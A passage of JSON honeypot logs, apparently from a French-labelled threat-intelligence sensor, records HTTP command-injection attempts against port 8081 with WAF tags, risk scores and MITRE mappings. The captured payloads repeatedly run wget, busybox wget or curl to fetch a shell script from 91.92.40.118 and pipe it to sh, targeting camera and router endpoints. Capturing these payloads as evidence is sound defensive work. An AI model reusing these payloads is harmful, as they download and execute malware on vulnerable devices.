\u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022d8998260b7b1d074b23097aed6af27dc269765e4\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/Security\/auditLog\/search\u0022, \u0022request_line\u0022: \u0022GET \/Security\/auditLog\/search?logTime=0;`cd HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/Security\/auditLog\/search?logTime=0;`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s hik3;busybox wget http:\/\/91.92.40.11\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/Security\/auditLog\/search\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag rce-0) \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag rce-0) \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 54\/100 (Moyen) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 60.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 15.0, \u0022risk_score\u0022: 54}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 54, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022MITRE-T1059\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0144\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022MITRE-T1059\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0144\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/Security\/auditLog\/search\u0022, \u0022request_line\u0022: \u0022GET \/Security\/auditLog\/search?logTime=0;`cd HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/Security\/auditLog\/search\u0022, \u0022evidence_snippet\u0022: \u0022GET \/Security\/auditLog\/search?logTime=0;`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s hik3;busybox wget http:\/\/91.92.40.11\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 60 \u00b7 2 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950325:rce-0\u0022, \u0022950468:nosqli-3\u0022, \u0022http_no_ua\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"\/tmp;wget","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950325:rce-0\u0022, \u0022950468:nosqli-3\u0022, \u0022http_no_ua\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":7,"bytes_in":252},{"id":11809686,"ip":"45.153.34.252","ts":"2026-07-14 02:29:42.000000","proto":"tcp","src_port":38176,"dst_port":8081,"service":"http","classification":"cmd_injection","waf_score":13,"waf_tags":"[\u0022950324:rce-0\u0022, \u0022950468:nosqli-3\u0022]","http_method":"GET","http_target":"\/cgi-bin\/;cd","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u0022d405befa78aaecee1efcf37cb58895c28b2ff19c\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 233, \u0022payload_entropy\u0022: 5.113570909067197, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 60.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 5.8, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 60.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 54, \u0022tag_count\u0022: 7, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u0022486c033eef6e81fd69d54a03e41989a3a16723b1\u0022, \u0022event_fingerprint\u0022: \u0022181c531f1ef010cf0a265e23219a9c3c03f1a8ea\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag rce-0) \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 304, \u0022precision_signals\u0022: [\u0022MITRE-T1059\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022MITRE-T1059\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 932100 cmd exec\u0022, \u0022CRS 932120 pipe chain\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 60.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 54}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022bff0470092d9b80c35253a12660b4cc0\u0022, \u0022path_pattern_hash\u0022: \u002260d5de007ff2546f34f0bc3749dc5e1b\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 54}, \u0022payload_preview\u0022: \u0022GET \/cgi-bin\/;cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wavlink;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wavl\u0022, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/cgi-bin\/;cd\u0022, \u0022waf_tags\u0022: [\u0022950324:rce-0\u0022, \u0022950468:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022rce-0\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022GET \/cgi-bin\/;cd HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/cgi-bin\/;cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wavlink;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wavlink;curl http:\/\/91.92.40.118\/wget.sh|sh -s wavlink HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nConnection: close\\r\\n\\r\\n\u0022, \u0022payload_snippet\u0022: \u0022GET \/cgi-bin\/;cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wavlink;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wavl\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/cgi-bin\/;cd\u0022, \u0022waf_tags\u0022: [\u0022950324:rce-0\u0022, \u0022950468:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022rce-0\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022GET \/cgi-bin\/;cd HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/cgi-bin\/;cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wavlink;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wavlink;curl http:\/\/91.92.40.118\/wget.sh|sh -s wavlink HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nConnection: close\\r\\n\\r\\n\u0022, \u0022payload_snippet\u0022: \u0022GET \/cgi-bin\/;cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wavlink;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wavl\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag rce-0) \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u002249565b0b0dd4db75b46d47449cdd712ade7c6a9d\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/;cd\u0022, \u0022request_line\u0022: \u0022GET \/cgi-bin\/;cd HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/cgi-bin\/;cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wavlink;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wavl\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/;cd\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag rce-0) \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag rce-0) \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 54\/100 (Moyen) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 60.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 54}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 54, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022MITRE-T1059\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0146\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022MITRE-T1059\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0146\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/;cd\u0022, \u0022request_line\u0022: \u0022GET \/cgi-bin\/;cd HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/;cd\u0022, \u0022evidence_snippet\u0022: \u0022GET \/cgi-bin\/;cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wavlink;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wavl\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 60 \u00b7 2 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950324:rce-0\u0022, \u0022950468:nosqli-3\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"\/tmp;wget","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950324:rce-0\u0022, \u0022950468:nosqli-3\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":7,"bytes_in":233},{"id":11809685,"ip":"45.153.34.252","ts":"2026-07-14 02:29:41.000000","proto":"tcp","src_port":38168,"dst_port":8081,"service":"http","classification":"config_file_probe","waf_score":47,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022]","http_method":"GET","http_target":"\/cgi-bin\/masterCGI?ping=nomip\u0026user=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20alcatel;","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 2, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u0022daeda2ae79a1c94f294763a7a4e3a3b7695e64a6\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 298, \u0022payload_entropy\u0022: 5.188526969343507, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 74.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.4, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 64, \u0022tag_count\u0022: 14, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u0022a5a843c7495fa04c24912ec32a13bd98be2793ed\u0022, \u0022event_fingerprint\u0022: \u00222b574d6034fa0fb437e9d8c5df97614e029279a5\u0022, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 127, \u0022precision_signals\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 64}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022backup_file_scan\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u002242fd74851afc42c87adebee806f4b184\u0022, \u0022path_pattern_hash\u0022: \u00229dbe1efebb97f3b2ef3472eff039ee1f\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 64}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20alcatel;\u0022, \u0022query_string\u0022: \u0022ping=nomip\u0026user=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20alcatel;\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/cgi-bin\/masterCGI?ping=nomip\u0026user=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20alcatel; HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/cgi-bin\/masterCGI?ping=nomip\u0026user=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wge\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20alcatel;\u0022, \u0022query_string\u0022: \u0022ping=nomip\u0026user=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20alcatel;\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, 